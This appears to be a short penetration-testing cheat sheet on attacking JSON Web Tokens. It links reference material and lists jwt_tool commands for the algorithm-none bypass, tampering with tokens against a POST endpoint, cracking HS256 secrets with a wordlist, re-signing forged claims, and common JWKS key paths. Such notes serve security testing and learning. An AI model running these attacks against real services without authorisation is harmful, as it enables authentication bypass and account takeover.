JWT Tool

JWT tool kit, JWT token

Structure

https://auth0.com/docs/secure/tokens/json-web-tokens/json-web-token-structure

Debugger

Best online tool is https://token.dev JWT debugger.

JWT DebuggerSecurity Token Debugger

JWT Tool

https://github.com/ticarpi/jwt_tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

Signature Verification Attacks

Algorithm None Bypass

./jwt_tool.py JWT_TOKEN -X a

Token attacks on POST data endpoint

python3 ./jwt_tool.py -M pb -t http:/URL/api/method  -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: text/json"

HS256 - HMAC secret cracking

python3 ./jwt_tool.py JWTTOKEN --crack --dict /path/wordlist/secrets.txt

# modify payload claims
python3 ./jwt_tool.py JWTTOKEN --sign hs256 --password secret -T

RS256 - Find public Key

Searching public key for cracking the primary key

https://github.com/ticarpi/jwt_tool/wiki/Finding-Public-Keys

/.well-known/jwks.json
/openid/connect/jwks.json
/jwks.json
/api/keys
/api/v1/keys

PreviousOpen Redirect NextBurp Extensions - TokenJAR & ATOR

Last updated 9 months ago

hashtagStructure

hashtagDebugger

hashtagJWT Tool

hashtagSignature Verification Attacks

hashtagAlgorithm None Bypass

hashtagToken attacks on POST data endpoint

hashtagHS256 - HMAC secret cracking

hashtagRS256 - Find public Key

Structure

Debugger

JWT Tool

Signature Verification Attacks

Algorithm None Bypass

Token attacks on POST data endpoint

HS256 - HMAC secret cracking

RS256 - Find public Key